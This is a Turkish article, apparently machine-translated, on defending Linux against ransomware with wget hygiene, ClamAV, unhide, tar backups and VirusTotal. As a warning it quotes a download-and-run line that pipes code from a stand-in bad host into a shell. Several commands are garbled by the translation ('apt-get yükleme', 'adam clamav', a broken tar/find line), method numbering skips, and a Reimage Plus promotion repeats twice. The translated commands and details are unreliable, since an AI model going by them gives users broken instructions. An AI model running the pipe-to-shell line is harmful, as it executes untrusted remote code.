Ransomwares Linux Nasıl Korunur

Fidye yazılımı, günümüzde ağ güvenliği dünyasında en çok tehdit oluşturan sorunlardan biridir. Birisinin veri rehin tuttuğunu düşünmek korkutucu. Bazı fidye yazılım enfeksiyonları, belirli bir hacimdeki tüm verileri şifreler ve arkasındaki kişiler, söz konusu verilerin kilidini açmak için gereken anahtarı serbest bırakmayı kabul etmeden önce belirli bir miktar para ister. Özellikle de verilere büyük miktarda para yatırmış olan insanlar için önemlidir. Bununla birlikte, Linux kullanıcıları için küçük bir iyi haber var.

Çoğu durumda, ransomware kodu için sadece bir kullanıcının ev dizini daha fazla bir şey kontrol etmek için zor. Bu programlar, tüm yüklemeyi çöpe atma iznine sahip değil. İşte bu yüzden Linux fidye yazılımı, operatörlerin her zaman root erişimine sahip olduğu sunucularda bir problemdir. Fidye yazılımları Linux kullanıcıları için bir sorun olmamalı ve bu durumun size gelmesini önlemek için atılması gereken birkaç adım var.

Yöntem 1: BashCrypt stili saldırılara karşı savunma

BasyCrypt, sunucu yapılarını bu tür kötü amaçlı kodlarla enfekte etmenin mümkün olduğunu kanıtlayan fidye yazılımı konsept parçasının bir kanıtıdır. Bu Linux ransomware paketlerinin nasıl görünebileceği için bir temel sağlar. Şu anda yaygın olmalarına rağmen, diğer platformların sunucu yöneticileri için aynı türden sağduyu önleyici tedbirler de burada aynı şekilde çalışmaktadır. Sorun, kurumsal düzeydeki ortamlarda, bir ana bilgisayar sistemi kullanan çok sayıda farklı insan olabileceği.

Bir posta sunucusu çalıştırıyorsanız, insanların aptalca şeyler yapmasını engellemek çok zor olabilir. Herkesin emin olmadıkları ekleri açmamalarını hatırlatmak için elinizden geleni yapın ve her zaman kötü amaçlı yazılım söz konusu olan her şeyi tarar. Bu tür saldırıları önlemeye gerçekten yardımcı olabilecek bir başka şey de, ikilileri nasıl wget ile kurduğunuzu izlemekten kaynaklanmaktadır. Doğal olarak posta sunucunuz muhtemelen bir masaüstü ortamından yoksundur ve muhtemelen gelen paketleri yönetmek için wget, apt-get, yum veya pacman kullanıyorsunuzdur. Bu yüklemelerde hangi depoların kullanıldığını izlemek çok önemlidir. Bazen wget gibi bir şeyi yürütmek isteyen bir komut göreceksiniz http: //www.thisisaprettybadcoderepo.webs/ -O- | sh, ya da bir kabuk betiğinin içinde olabilir. Her iki durumda da, deponun ne için olduğunu bilmiyorsanız onu çalıştırmayın.

Yöntem 2: bir tarayıcı paketi yükleme

Açık kaynaklı kötü amaçlı yazılım tarama teknolojisinin birkaç parçası var. ClamAV şu ana kadar en ünlüsüdür ve aşağıdakileri kullanarak birçok apt tabanlı dağıtımlara yükleyebilirsiniz:

sudo apt-get yükleme clamav

Kurulduktan sonra, adam clamav kullanımı sade dilde açıklamalıdır. Virüs bulaşmış dosyaları tarayabilir ve kaldırabilirken, aslında bulaşıcı kodun bir dosyadan kaldırılamayacağını unutmayın. Bu bir ya hep ya hiç durum değil.

Tanıyamayacağınız ikinci bir tarayıcı var, ancak gizli süreçler sizi korkutacaksa yararlıdır. Yine apt tabanlı bir dağıtım kullanıyorsanız, tarayıcıyı yüklemek için bu komutu verin:

sudo apt-get install unhide

PRO TIP: Sorun bilgisayarınız veya dizüstü bilgisayar / dizüstü bilgisayar ile yapılmışsa, depoları tarayabilen ve bozuk ve eksik dosyaları değiştirebilen Reimage Plus Yazılımı'nı kullanmayı denemeniz gerekir. Bu, çoğu durumda, sorunun sistem bozulmasından kaynaklandığı yerlerde çalışır. Reimage Plus'ı tıklayarak buraya tıklayarak indirebilirsiniz.

Yüklendiğinde, şunu yazın:

sudo unhide sys

Bu, gizli işlemler için sisteminizin tam bir taramasını yapar.

Yöntem 4: Yedeklemeleri el altında tutmak

Herkesin her zaman yedek yapması gerektiğinden, bu bir sorun olmamasına rağmen, iyi yedeklere sahip olmak, fidye yazılımını anında kapatabilir. Linux platformunda bulunan çok az fidye yazılımı, Web geliştirme platformlarına özgü uzantıları olan dosyalara saldırmaya eğilimlidir. Bunun anlamı, bir ton .php, .xml veya .js kodunuz varsa, özellikle bunu yedeklemek isteyeceksiniz. Aşağıdaki kod satırını düşünün:

tar -cf backups.tar $ (find -name * .ruby -ve -name * .html)

Bu, bir dosya yapısındaki .ruby ve .html uzantıları ile her dosyanın büyük bir teyp arşiv dosyası oluşturmalıdır. Daha sonra, düzgün bir şekilde çalışmasını sağlamak için çıkarma için farklı bir geçici alt dizine taşınabilir.

Bu teyp arşivi harici bir hacme taşınabilir ve taşınmalıdır. Bunu yapmadan önce elbette .bz2, .gz veya .xv sıkıştırmayı kullanabilirsiniz. İki farklı cihaza kopyalayarak yansıtılmış yedeklemeler oluşturmak isteyebilirsiniz.

Yöntem 5: Web tabanlı tarayıcıları kullanma

Belki de yararlı bir yazılım içermeyi vaat eden bir siteden bir RPM veya DEB paketi indirdiniz. Yazılım ayrıca 7z veya sıkıştırılmış katran dosyaları ile de dağıtılmaktadır. Mobil kullanıcılar da Android paketlerini APK formatında alabilir. Bunları tarayıcınızda bir araçla taramak çok kolay. Https://www.virustotal.com/ adresine gidin ve sayfa yüklendiğinde Dosya Seç düğmesine basın. Yüklemeden önce, bunun bir genel sunucu olduğunu unutmayın. Güvenli ve Alphabet Inc tarafından çalıştırılırken, bazı süper güvenli ortamlarda bir sorun olabilir, dosyaları genel olarak aktarır. Ayrıca 128 MB dosyalarla sınırlıdır.

Açılan kutuda dosyanızı seçin ve aç'ı seçin. Dosya adı, kutu kapandıktan sonra düğmenin yanındaki satırda görünecektir.

Büyük mavi üzerine tıklayın Bunu tarayın! buton. Sistemin dosyanızı yüklediğini belirten başka bir kutu göreceksiniz.

Birisi önceden dosyayı önceden kontrol ettiyse, önceki rapordan sizi haberdar eder. Bunu, alıştığınız Linux komut satırı araçlarıyla aynı şekilde çalışan bir SHA256 toplamını temel alarak tanır. Değilse, o zaman 53 farklı tarama programı ile tam bir tarama çalışacaktır. Dosya çalıştırıldığında bunların bir kısmı zaman aşımına uğrayabilir ve bu sonuçlar güvenli bir şekilde göz ardı edilebilir.

Bazı programlar diğerlerinden farklı sonuçlar verebilir, bu nedenle bu sistemle yanlış pozitifleri ayıklamak kolaydır. En iyi yanı, farklı platformlar arasında çalıştığından, farklı cihazlarda hangi dağıtıma sahip olursanız olun, aynı derecede cazip hale getirilmesidir. Ayrıca, Android gibi mobil dağıtımlardan da iyi bir şekilde çalışıyor. Bu da, kullanmadan önce APK paketlerini incelemenin harika bir yoludur.

PRO TIP: Sorun bilgisayarınız veya dizüstü bilgisayar / dizüstü bilgisayar ile yapılmışsa, depoları tarayabilen ve bozuk ve eksik dosyaları değiştirebilen Reimage Plus Yazılımı'nı kullanmayı denemeniz gerekir. Bu, çoğu durumda, sorunun sistem bozulmasından kaynaklandığı yerlerde çalışır. Reimage Plus'ı tıklayarak buraya tıklayarak indirebilirsiniz.

Facebook Twitter Google Plus Pinterest